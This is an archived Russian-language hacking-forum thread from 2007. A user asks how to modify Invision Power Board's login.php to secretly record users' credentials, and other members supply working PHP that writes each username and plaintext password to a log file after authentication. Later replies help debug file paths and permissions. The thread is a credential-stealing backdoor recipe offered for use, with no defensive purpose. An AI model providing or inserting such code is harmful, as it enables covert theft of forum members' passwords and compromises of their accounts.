ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.08.2007, 23:24
|
|
Новичок
Регистрация: 10.06.2007
Сообщений: 26
Провел на форуме:
105092
Репутация:
4
|
|
Подскажите пожалуйста, где и что в ipb нужно прописать что бы перехватывались логин и пароль...
путь вроде такой /***/sources/action_public/login.php
 |
|
|
30.08.2007, 23:59
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
Нужно после функции афторицации прописать чтоб они в фаил записывались.. была такая тема на ачате....
|
|
|
|
31.08.2007, 01:05
|
|
Новичок
Регистрация: 10.06.2007
Сообщений: 26
Провел на форуме:
105092
Репутация:
4
|
|
PHP код:
/*-------------------------------------------------------------------------*/
// DO LOG IN
/*-------------------------------------------------------------------------*/
function do_log_in()
{
//-----------------------------------------
// INIT
//-----------------------------------------
$url = "";
$member = array();
//-----------------------------------------
// Load handler...
//-----------------------------------------
require_once( ROOT_PATH.'sources/handlers/han_login.php' );
$this->han_login = new han_login();
$this->han_login->ipsclass =& $this->ipsclass;
$this->han_login->init();
//-----------------------------------------
// Make sure the username and password were entered
//-----------------------------------------
if ( $_POST['UserName'] == "" )
{
if( $this->ipsclass->vars['ipbli_usertype'] == 'username' )
{
$this->ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'no_username' ) );
}
else
{
$this->ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'no_email_login' ) );
}
}
if ( $_POST['PassWord'] == "" )
{
$this->ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'pass_blank' ) );
}
//-----------------------------------------
// Check for input length
//-----------------------------------------
if ( $this->ipsclass->vars['ipbli_usertype'] == 'username' )
{
if ( $this->ipsclass->txt_mb_strlen( $_POST['UserName'] ) > 32 )
{
$this->ipsclass->Error( array( LEVEL => 1, MSG => 'username_long' ) );
}
$username = strtolower(str_replace( '|', '|', $this->ipsclass->input['UserName']) );
}
else
{
$username = strtolower( trim( $this->ipsclass->input['UserName'] ) );
}
if ( $this->ipsclass->txt_mb_strlen( $_POST['PassWord'] ) > 32)
{
$this->ipsclass->Error( array( LEVEL => 1, MSG => 'pass_too_long' ) );
}
$password = md5( $this->ipsclass->input['PassWord'] );
//-----------------------------------------
// Check auth
//-----------------------------------------
$this->han_login->login_authenticate( $username, $this->ipsclass->input['PassWord'] );
//-----------------------------------------
// Check return code...
//-----------------------------------------
$member = $this->han_login->member;
if ( ( ! $member['id'] ) or ( $this->han_login->return_code == 'NO_USER' ) )
{
$this->log_in_form( 'wrong_name' );
}
if ( $this->han_login->return_code != 'SUCCESS' )
{
if ( $this->han_login->return_code == 'ACCOUNT_LOCKED' )
{
$extra = "<!-- -->";
if( $this->ipsclass->vars['ipb_bruteforce_unlock'] )
{
if( $this->han_login->account_unlock )
{
$time = time() - $this->han_login->account_unlock;
$time = ( $this->ipsclass->vars['ipb_bruteforce_period'] - ceil( $time / 60 ) > 0 ) ? $this->ipsclass->vars['ipb_bruteforce_period'] - ceil( $time / 60 ) : 1;
$extra = sprintf( $this->ipsclass->lang['bruteforce_account_unlock'], $time );
}
}
$this->ipsclass->Error( array( 'LEVEL' => 5, 'MSG' => 'bruteforce_account_lock', 'EXTRA' => $extra ) );
}
else
{
$this->log_in_form( 'wrong_auth' );
}
}
//-----------------------------------------
Что и куда нужно вставить, чтобы логины и пароли записывались в отдельный файлик...
Последний раз редактировалось Reanimat0R; 31.08.2007 в 01:09..
|
|
|
|
31.08.2007, 07:33
|
|
Новичок
Регистрация: 10.06.2007
Сообщений: 26
Провел на форуме:
105092
Репутация:
4
|
|
Ну кто поможет?
|
|
|
|
31.08.2007, 11:14
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Вставь этот код:
$fp = fopen("login.log", "a+");
$line = sprintf("%s: %s:%s", date("d.m.y H:i:s"), $username, $this->ipsclass->input['PassWord']);
fputs($fp, $line);
fclose($fp);
после:
//-----------------------------------------
// Check auth
//-----------------------------------------
|
|
|
|
31.08.2007, 11:38
|
|
Новичок
Регистрация: 10.06.2007
Сообщений: 26
Провел на форуме:
105092
Репутация:
4
|
|
Что-то не так, файл с логами не создается
|
|
|
|
31.08.2007, 11:40
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от Reanimat0R
Что-то не так, файл с логами не создается
создай вручную и права поставь 755
либо на каталог 777 кажется.
|
|
|
|
31.08.2007, 11:48
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
n1†R0x, всё верно.
Reanimat0R, ты хорошо посмотри... Он создаётся в текущей директории скрипта, то есть текущей для основного скрипта, который инклудит изменённый тобой. В общем для верности пропиши путь к логу, что-то типа:
$fp = fopen("/var/www/html/login.log", "a+");
Путь разумеется на твоём серве другой...
|
|
|
|
31.08.2007, 12:12
|
|
Новичок
Регистрация: 10.06.2007
Сообщений: 26
Провел на форуме:
105092
Репутация:
4
|
|
Блин...Что-то все равно не так...
Вот сам файлик:
http://slil.ru/24799099
|
|
|
|
31.08.2007, 12:21
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Кстати, код немного поправь:
$fp = fopen("/www/c6forum/sources/action_public/logi.txt", "a+");
$line = sprintf("%s: %s:%s\n", date("d.m.y H:i:s"), $username, $this->ipsclass->input['PassWord']);
fputs($fp, $line);
fclose($fp);
А то не кошерно когда оно в одну строчку всё лепит... А вообще ты пробовал ставить на каталог в который пишешь права rwxrwxrwx (777)? |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
